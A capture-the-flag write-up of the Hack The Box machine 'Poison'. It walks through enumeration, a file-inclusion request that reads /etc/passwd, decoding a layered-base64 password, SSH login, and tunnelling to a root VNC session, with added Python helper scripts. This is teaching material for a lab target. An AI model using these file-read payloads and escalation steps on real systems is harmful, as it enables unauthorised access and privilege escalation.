Great box over at hackthebox.eu, which taught me a nifty new trick. Let's get started!
Enumeration
As always, we start with a full nmap scan:
```
sudo nmap -sV -sC -oA initial -p- 10.10.10.84

Nmap scan report for 10.10.10.84
Host is up (0.038s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey:
|   2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
|   256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
|_  256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 413.45 seconds
```
So we have port 80 running an HTTP service (Apache 2.4.29 with PHP 5.6.32) and port 22 running SSH.
Browsing to the web page shows a simple tester that loads a local PHP script by name through browse.php. The page suggests the following scripts to try: ini.php, info.php, listfiles.php, phpinfo.php
info.php reveals the following:
```
FreeBSD Poison 11.1-RELEASE FreeBSD 11.1-RELEASE #0 r321309: Fri Jul 21 02:08:28 UTC 2017     root@releng2.nyi.freebsd.org:/usr/obj/usr/src/sys/GENERIC  amd64
```
The machine runs FreeBSD 11.1. This might come in handy later. Running listfiles.php shows:
```
Array
(
    [0] => .
    [1] => ..
    [2] => browse.php
    [3] => index.php
    [4] => info.php
    [5] => ini.php
    [6] => listfiles.php
    [7] => phpinfo.php
    [8] => pwdbackup.txt
)
```
pwdbackup.txt sounds like an interesting file. But first, let's see what happens when we change the value of the file= parameter that browse.php uses to load those scripts. It turns out the parameter is not restricted to the scripts in the web root at all; an absolute path is read straight back:
```
http://10.10.10.84/browse.php?file=/etc/passwd

# $FreeBSD: releng/11.1/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
unbound:*:59:59:Unbound DNS Resolver:/var/unbound:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
auditdistd:*:78:77:Auditdistd unprivileged user:/var/empty:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
_ypldap:*:160:160:YP LDAP unprivileged user:/var/empty:/usr/sbin/nologin
hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
_tss:*:601:601:TrouSerS user:/var/empty:/usr/sbin/nologin
messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/usr/sbin/nologin
avahi:*:558:558:Avahi Daemon User:/nonexistent:/usr/sbin/nologin
cups:*:193:193:Cups Owner:/nonexistent:/usr/sbin/nologin
charix:*:1001:1001:charix:/home/charix:/bin/csh
```
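As an added example (not part of the original write-up), here is a small Python helper that parses passwd text pulled back through the file parameter and lists only the accounts that can actually log in, instead of eyeballing thirty lines by hand. The sample input is a constructed subset of the entries above; the parser follows FreeBSD's passwd(5) rule that an empty shell field means /bin/sh.

```python
# Added example: pick out login-capable accounts from /etc/passwd text.
# SAMPLE_PASSWD is a constructed subset of the listing pulled from the box.

NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/usr/bin/false"}

SAMPLE_PASSWD = """\
# $FreeBSD: releng/11.1/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
charix:*:1001:1001:charix:/home/charix:/bin/csh
"""


def parse_passwd(text):
    """Yield (user, uid, gid, home, shell) for every well-formed passwd entry."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue  # skip junk such as HTML wrapped around the file by the web app
        user, _pw, uid, gid, _gecos, home, shell = fields
        if not uid.isdigit() or not gid.isdigit():
            continue
        # FreeBSD passwd(5): an empty shell field means /bin/sh, not "no login".
        yield user, int(uid), int(gid), home, shell or "/bin/sh"


def login_accounts(text):
    """Accounts with a real shell, human users (uid >= 1000) listed first."""
    accts = [a for a in parse_passwd(text) if a[4] not in NOLOGIN_SHELLS]
    return sorted(accts, key=lambda a: (a[1] < 1000, a[1]))


def candidate_users(text):
    """Non-system accounts worth trying a recovered password against."""
    return [a[0] for a in login_accounts(text) if a[1] >= 1000]


if __name__ == "__main__":
    for user, uid, gid, home, shell in login_accounts(SAMPLE_PASSWD):
        print(f"{user:10} uid={uid:<6} home={home:14} shell={shell}")
    print("candidates:", candidate_users(SAMPLE_PASSWD))
```

Feeding it the full listing above gives the same answer as reading it by eye: root and toor are the superuser entries, and charix is the only non-system account with a shell.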
So the only non-system account with a login shell is charix (uid 1001); that is probably our user.
Let's see what is in that pwdbackup.txt file by requesting http://10.10.10.84/browse.php?file=pwdbackup.txt
```
This password is secure, it's encoded atleast 13 times.. what could go wrong really..

[long base64 blob, not reproduced here]
```
The rest of the file is one long blob that looks like base64 (letters, digits, + and /, with = padding at the end), and the hint says it has been encoded at least 13 times. Note that this is encoding, not encryption: there is no key to recover, so anyone who can read the file can undo it. I used GCHQ's CyberChef, stacking "From Base64" operations and peeling off one layer at a time until readable text came out. It gives us the following password:
```
Charix!2#4%6&8(0
```
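The CyberChef recipe can just as well be scripted. The following Python is an added example, not part of the original write-up: it peels base64 layers off a blob and stops on its own when the result is no longer base64, so you do not have to trust the "13 times" in the hint. The real blob from the box is not reproduced here; the sample is constructed by wrapping the recovered password in 13 layers ourselves.

```python
import base64
import binascii
import re
import string

# Added example: strip nested base64 layers automatically.
# SAMPLE is constructed below by encoding the password 13 times, the same way
# pwdbackup.txt was built; the blob from the box itself is not reproduced.

B64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")
PRINTABLE = set(string.printable.encode())
PASSWORD = b"Charix!2#4%6&8(0"


def wrap(data: bytes, layers: int) -> bytes:
    """Apply base64 `layers` times (how the backup file was produced)."""
    for _ in range(layers):
        data = base64.b64encode(data)
    return data


SAMPLE = wrap(PASSWORD, 13)


def _normalize(data: bytes) -> bytes:
    # Base64 dumps are often line-wrapped; whitespace carries no information.
    return b"".join(data.split())


def looks_like_base64(data: bytes) -> bool:
    s = _normalize(data)
    if len(s) < 4 or len(s) % 4:
        return False
    return B64_RE.fullmatch(s.decode("ascii", "replace")) is not None


def peel(blob: bytes, max_layers: int = 64):
    """Return (plaintext, layers_removed).

    Stops when the current data is not valid base64, or when one more decode
    would produce non-printable bytes (i.e. the previous layer was already the
    real content). Caveat: a plaintext that happens to be valid base64 and
    decodes to printable bytes would be peeled one layer too far.
    """
    data = blob
    layers = 0
    while layers < max_layers and looks_like_base64(data):
        try:
            decoded = base64.b64decode(_normalize(data), validate=True)
        except binascii.Error:
            break
        if not decoded or any(b not in PRINTABLE for b in decoded):
            break
        data = decoded
        layers += 1
    return data.strip(), layers


if __name__ == "__main__":
    text, n = peel(SAMPLE)
    print(f"removed {n} layers -> {text.decode()}")
```

The stop condition matters more than the loop: the password contains characters outside the base64 alphabet (!, #, %, &, (), which is exactly why decoding halts at the right place.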
The only other service we've seen so far is SSH, and charix is the only user with a shell, so let's try the password there.
Exploitation
```
ssh 10.10.10.84 -l charix
Password: Charix!2#4%6&8(0
```
And we're logged in.
Privilege Escalation
After running LinEnum (which is Linux-oriented, so on FreeBSD I double-check with sockstat), I noticed that root is running a VNC server: Xvnc listens on 127.0.0.1:5901 and 127.0.0.1:5801, alongside sshd (which I already used to get onto the box). Because the VNC ports are bound to loopback only, they cannot be reached from my attacking machine directly, so I need an SSH tunnel through charix's account and a VNC viewer pointed at the local end of it to reach the root session on Poison.
Listing the listening sockets:
```
charix@Poison:~ % sockstat -l
USER     COMMAND    PID   FD PROTO  LOCAL ADDRESS         FOREIGN ADDRESS
www      httpd      713   3  tcp6   *:80                  *:*
www      httpd      713   4  tcp4   *:80                  *:*
www      httpd      712   3  tcp6   *:80                  *:*
www      httpd      712   4  tcp4   *:80                  *:*
www      httpd      711   3  tcp6   *:80                  *:*
www      httpd      711   4  tcp4   *:80                  *:*
root     sendmail   642   3  tcp4   127.0.0.1:25          *:*
www      httpd      641   3  tcp6   *:80                  *:*
www      httpd      641   4  tcp4   *:80                  *:*
www      httpd      640   3  tcp6   *:80                  *:*
www      httpd      640   4  tcp4   *:80                  *:*
www      httpd      639   3  tcp6   *:80                  *:*
www      httpd      639   4  tcp4   *:80                  *:*
www      httpd      638   3  tcp6   *:80                  *:*
www      httpd      638   4  tcp4   *:80                  *:*
www      httpd      637   3  tcp6   *:80                  *:*
www      httpd      637   4  tcp4   *:80                  *:*
root     httpd      625   3  tcp6   *:80                  *:*
root     httpd      625   4  tcp4   *:80                  *:*
root     sshd       620   3  tcp6   *:22                  *:*
root     sshd       620   4  tcp4   *:22                  *:*
root     Xvnc       529   0  stream /tmp/.X11-unix/X1
root     Xvnc       529   1  tcp4   127.0.0.1:5901        *:*
root     Xvnc       529   3  tcp4   127.0.0.1:5801        *:*
root     syslogd    390   4  dgram  /var/run/log
root     syslogd    390   5  dgram  /var/run/logpriv
root     syslogd    390   6  udp6   *:514                 *:*
root     syslogd    390   7  udp4   *:514                 *:*
root     devd       319   4  stream /var/run/devd.pipe
root     devd       319   5  seqpac /var/run/devd.seqpacket.pipe
```
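On a box with many listeners it is easy to miss the one that matters. As an added example (not part of the original write-up), this Python snippet parses `sockstat -l` output and reports only the sockets bound to a loopback address, which are exactly the services that are invisible from outside and therefore candidates for an SSH port forward. The sample input is a trimmed copy of the listing above; the generated ssh one-liners assume the same charix login and target used on this box.

```python
# Added example: find loopback-only listeners in `sockstat -l` output (FreeBSD)
# and turn them into `ssh -L` forwards. SAMPLE_SOCKSTAT is a trimmed copy of
# the listing from the box.

SAMPLE_SOCKSTAT = """\
USER     COMMAND    PID   FD PROTO  LOCAL ADDRESS         FOREIGN ADDRESS
www      httpd      713   4  tcp4   *:80                  *:*
root     sendmail   642   3  tcp4   127.0.0.1:25          *:*
root     sshd       620   4  tcp4   *:22                  *:*
root     Xvnc       529   0  stream /tmp/.X11-unix/X1
root     Xvnc       529   1  tcp4   127.0.0.1:5901        *:*
root     Xvnc       529   3  tcp4   127.0.0.1:5801        *:*
root     syslogd    390   7  udp4   *:514                 *:*
root     devd       319   4  stream /var/run/devd.pipe
"""

LOOPBACK_PREFIXES = ("127.", "[::1]", "::1")


def parse_sockstat(text):
    """Yield one dict per TCP/UDP entry; unix sockets (stream/dgram/seqpac) are skipped."""
    for line in text.splitlines()[1:]:  # first line is the column header
        parts = line.split()
        if len(parts) < 6:
            continue
        user, command, pid, _fd, proto, local = parts[:6]
        if not proto.startswith(("tcp", "udp")):
            continue
        host, _, port = local.rpartition(":")  # works for IPv6 "[::1]:5901" too
        yield {"user": user, "command": command, "pid": int(pid),
               "proto": proto, "host": host, "port": int(port)}


def loopback_listeners(text):
    """Sorted (user, command, proto, port) for sockets bound only to loopback."""
    return sorted(
        (e["user"], e["command"], e["proto"], e["port"])
        for e in parse_sockstat(text)
        if e["host"].startswith(LOOPBACK_PREFIXES)
    )


def forward_commands(text, target, login):
    """One `ssh -L` command per loopback TCP listener (assumed host/login)."""
    return [
        f"ssh -L {port}:localhost:{port} -N -f -l {login} {target}"
        for _user, _command, proto, port in loopback_listeners(text)
        if proto.startswith("tcp")
    ]


if __name__ == "__main__":
    for entry in loopback_listeners(SAMPLE_SOCKSTAT):
        print("loopback-only:", entry)
    for cmd in forward_commands(SAMPLE_SOCKSTAT, "10.10.10.84", "charix"):
        print(cmd)
```

Run against the full listing it flags three sockets, all owned by root: sendmail on 25 and the two Xvnc ports, 5801 and 5901. The httpd and sshd listeners bound to `*` are already reachable and need no tunnel.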
I used http://www.cl.cam.ac.uk/research/dtg/attarchive/vnc/sshvnc.html and https://null-byte.wonderhowto.com/how-to/remotely-control-computers-over-vnc-securely-with-ssh-0132656/ as references for tunnelling VNC over SSH.
There is also a secret.zip file on the machine, which unpacks to a file named secret that can be handed to vncviewer with -passwd. Let's start by setting up a tunnel that forwards local port 5901 to 127.0.0.1:5901 as seen from Poison (-N runs no remote command, -f backgrounds the session once authentication succeeds):
```
ssh -L 5901:localhost:5901 -N -f -l charix 10.10.10.84
```
Pointing vncviewer at the local end of the tunnel with the extracted password file, we get the desktop of the root user, which contains the root flag:
```
vncviewer -passwd secret localhost:5901
```
Two things are worth noting. First, the -passwd argument is a VNC password file, not a cleartext password: vncpasswd obfuscates the (at most 8-character) password with a fixed, publicly known DES key, so a readable password file is as good as the password itself. Second, binding Xvnc to 127.0.0.1 keeps it off the network, but it offers no protection against a local user who can both tunnel to the port and read the password file; running the desktop session as root is what turns that into a full compromise.